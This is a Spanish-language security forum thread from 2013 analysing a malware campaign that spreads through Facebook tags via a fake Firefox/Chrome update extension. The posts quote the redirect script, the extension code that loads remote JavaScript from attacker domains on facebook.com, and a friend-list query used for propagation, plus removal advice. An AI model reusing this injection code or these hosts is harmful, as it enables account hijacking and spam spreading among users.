comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Malware se propaga mediante "etiquetas" en Facebook

  • 8 Respuestas
  • 4075 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Root Security
    • Email
  • Skype: code.punisher
« en: Marzo 14, 2013, 06:17:53 am »

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las  etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات  y según google es Persa… que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta No tienes permisos para ver links. Registrate o Entra con tu cuenta  WDF…!! Pero seguí mas adelante tome la dirección No tienes permisos para ver links. Registrate o Entra con tu cuenta  al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

Código: PHP
  1. var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
  2. var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
  3. var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
  4. var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
  5. if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
  6. else
  7. if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
  8. else
  9. if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
  10. else
  11. {var inst="http://www.sosyalpaket.net/chrome.php"}

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.


Lo que me dio risa fue ese mensaje de “Debido a los errores del sistema y vulnerabilidades de seguridad” jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

No tienes permisos para ver links. Registrate o Entra con tu cuenta

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.


Y encontré algo que me resulto familiar

Código: Javascript
  1. if(location.hostname.indexOf("facebook.com") >= 0){
  2.  
  3. addJavascript('http://sosyalpaket.net/yeni.php');
  4.  
  5. addJavascript('http://fbmedyahizmetleri.com/bakgel.php');
  6.  
  7. addJavascript('http://facebookhizmetlerim.com/user.php');
  8.  
  9. }

En el user.php me tope con:
Código: PHP
  1. "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  2.  
  3. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.


Lo más razonable es eliminarlo.
Saludos
« Última modificación: Diciembre 08, 2014, 03:10:55 pm por Expermicid »

Desconectado M1CR0B110

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Marzo 26, 2013, 04:05:35 pm »
Buena  info

Desconectado F0M3T

  • *
  • Underc0der
  • Mensajes: 177
  • Actividad:
    0%
  • Reputación 0
  • Antes de empezar, mira el lienzo...
    • Ver Perfil
    • f0m3t blogsgsgsgsdfñsadf
« Respuesta #2 en: Marzo 26, 2013, 04:20:07 pm »
Buenísimo aporte, y gran descubrimiento, gracias por aportarlo, ahora nadamás nos queda darlo a conocer para que todos se cuiden.
Saludos.

Esto no se trata de ganar, se trata de no perder.

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Root Security
    • Email
  • Skype: code.punisher
« Respuesta #3 en: Marzo 26, 2013, 06:14:53 pm »
En el navegador de Gogle Chrome el malware se encuentra en : C:\Users\"Uusario"\AppData\Local\Google\Chrome\User Data\Default\Extensions (en Windows 7)
Pues si lo eliminan directamente del navegador no se podra pues tiene redireciones al entrar a chrome://extensions/  al WebStore..!! Asique es mejor eliminarlo manualmente.

Lo interezante del complementoen Google  chrome posee una especie de "bypass" que hace al que se instale como si fuera del un complemento del WebStore (testeado en WinXp) pues no necesita la dichosa "--enable-easy-off-store-extension-install". algo que muy interesante.

Saludos...
atte.: CodePunisher


Desconectado mhz

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Marzo 28, 2013, 01:24:19 am »
Muy interesante el post . podrias subir la muestra del malware a algun lado ? me interesaria hacerle un research en especial a ese supuesto "bypass" de chrome saludos :)

Desconectado peruvianrulez

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: peruvianrulez
« Respuesta #5 en: Abril 05, 2013, 04:29:17 am »
muy buena explicacion sobre todo con las imagenes que dejan ver lo necesario ... pero bueno si tiene alguien tutorial sobre esto y de likejacking seriabueno q lo incluyan aca

Desconectado EvilSoft

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Abril 11, 2013, 10:00:11 am »
excelente informacion ...... codepunisher

Desconectado bruxinho

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: bruxinho_dark
« Respuesta #7 en: Junio 30, 2013, 12:51:52 pm »
interessante informacion rs

Desconectado elshotta

  • *
  • Underc0der
  • Mensajes: 87
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Julio 02, 2013, 01:31:35 pm »
mmm muy bueno pero los codigos php de donde los sacaste?
o los adivinaste
saludos

 

¿Te gustó el post? COMPARTILO!



Análisis de Malware: Enfoque y caso práctico | Seguridad Informática

Iniciado por Expermicid

Respuestas: 2
Vistas: 3246
Último mensaje Agosto 21, 2014, 10:43:22 pm
por WhiZ
[WinLockLess] Protege tu inicio contra el Malware en Windows.

Iniciado por Baku

Respuestas: 7
Vistas: 4054
Último mensaje Octubre 23, 2014, 05:50:24 am
por Gabriela
Creacion de BOT MSN + Infeccion de Malware ING SOCIAL + Automatizado

Iniciado por Cronos

Respuestas: 9
Vistas: 4189
Último mensaje Octubre 26, 2012, 09:57:38 am
por munter
Análisis de Malware(Dynamic Analysis) [Parte 2]

Iniciado por fudmario

Respuestas: 1
Vistas: 2716
Último mensaje Febrero 04, 2014, 01:11:24 pm
por hikari
Archivos CPL: mecanismo para propagar malware

Iniciado por Gabriela

Respuestas: 4
Vistas: 3166
Último mensaje Agosto 17, 2016, 02:54:49 pm
por circunsxik